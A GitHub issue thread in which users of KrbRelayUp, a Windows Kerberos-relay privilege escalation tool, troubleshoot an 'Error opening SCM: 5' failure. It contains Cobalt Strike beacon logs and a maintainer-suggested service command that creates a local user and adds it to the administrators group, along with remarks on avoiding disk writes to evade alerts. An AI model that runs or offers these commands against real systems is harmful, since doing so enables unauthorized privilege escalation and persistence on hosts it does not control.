Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Error opening SCM: 5 #10

Open
frbor opened this issue May 5, 2022 · 12 comments
Open

Error opening SCM: 5 #10

frbor opened this issue May 5, 2022 · 12 comments

Comments

@frbor
Copy link

frbor commented May 5, 2022

When I run the tool I get the error Error opening SCM: 5:

krbrelayup-scm-5

Do you have any idea what blocks this?

It looks like OpenSCManager fails

KrbRelayUp/KrbRelayUp/KrbSCM.cs

Line 56 in 6564f0f

IntPtr hScm = OpenSCManager("127.0.0.1", null, ScmAccessRights.Connect | ScmAccessRights.CreateService);
but not sure what can cause this?

For reference, when running the same command as administrator it runs without any error.
@frbor frbor changed the title Fails with Error opening SCM: 5 May 5, 2022
@c0pp3r
Copy link

c0pp3r commented May 5, 2022

I am actually having the same exact issue in a brand new detectionlab environment in azure. Everything works fine until that step and I get the same SCM: 5

@Dec0ne
Copy link
Owner

Dec0ne commented May 10, 2022

Can you confirm that the high priv ticket was imported? (Use klist command)
If so, try to run krbrelayup.exe krbscm after getting this error and making sure that the ticket is indeed in klist.
Let me know if that helps.

@frbor
Copy link
Author

frbor commented May 10, 2022

Thanks for replying to this issue!

I confirm that I have a ticket which I can find using klist:

Cached Tickets: (1)

#0>     Client: Administrator @ (...)

Using KrbRelayUp.exe krbscm however, I get the same error:

KrbRelayUp.exe krbscm -s test-test2
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[-] Error opening SCM: 5

@c0pp3r
Copy link

c0pp3r commented May 10, 2022
edited
Loading

I have just confirmed the same thing as well!

beacon> shell klist
[*] Tasked beacon to run: klist
[+] host called home, sent: 36 bytes
[+] received output:

Current LogonId is 0:0x363b460

Cached Tickets: (1)

#0> Client: Administrator @ WINDOMAIN.LOCAL
Server: HOST/WIN10 @ WINDOMAIN.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 5/10/2022 12:36:16 (local)
End Time: 5/10/2022 22:36:16 (local)
Renew Time: 5/17/2022 12:36:16 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

beacon> execute-assembly /Library/Tools/KrbRelayStuff/KrbRelayUp.exe krbscm
[*] Tasked beacon to run .NET program: KrbRelayUp.exe krbscm
[+] host called home, sent: 481847 bytes
[+] received output:
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00000000
[-] Error opening SCM: 5

@vysecurity
Copy link

Same, having this error.

@Dec0ne
Copy link
Owner

Dec0ne commented May 18, 2022

When using the tool from memory you have to specify --ServiceCommand since the default will be "{ToolPathOnDisk} system {DesktopSessionToSpawnCmdIn}" (ie: C:\Tools\KrbRelayUp.exe system 1) and since it's not on disk the service will fail upon execution.
Try specifying --ServiceCommand "cmd.exe /c net user test QWERTY123 /add && net localgroup administrators test /add" for example.

@vysecurity
Copy link

Wonder if you've had a look at the U2U escalation using user account? @Dec0ne

@frbor
Copy link
Author

frbor commented May 18, 2022

Not sure if the comment above was related to this issue (since the tool is on disk), but I tried with --ServiceCommand argument as specified, and that did not help.

@c0pp3r
Copy link

c0pp3r commented May 19, 2022

@Dec0ne I've been using service command to execute a new instance of the beacon I dropped on disk, I also tried the new localgroup command you posted above and got the same result i posted previously.

@vysecurity
Copy link

Same, I've always used the sc command. We don't really use the spawn CMD thing because we don't drop files on disk as it could raise alerts easier.

@naksyn
Copy link

naksyn commented Sep 5, 2022

Same here, the issue for me is arising when I run from memory.

@mc-0815
Copy link

mc-0815 commented Aug 29, 2023

Hi,

I have exactly the same issue.

When debugging the network traffic I recognized that the rpc bind request ends up with a bind_nak response and the error code "Invalid checksum" which meaning is according to MS RPC Documentation (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/6f81bffe-8fce-498a-addf-94654a57b329) "This rejection code is used when an unrecoverable error is detected by the underlying security package."

The ticket is in the cache, the user has local admin privilege. However the SCMUACBypass part seams to fail because of unknown reason.

Is anyone aware if there exists a specific (hardening) configuration would prevent leveraging hte ticket locally via SCMUACBypass?

Any ideas would be very appreciated. Thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
6 participants
@c0pp3r @frbor @vysecurity @mc-0815 @Dec0ne @naksyn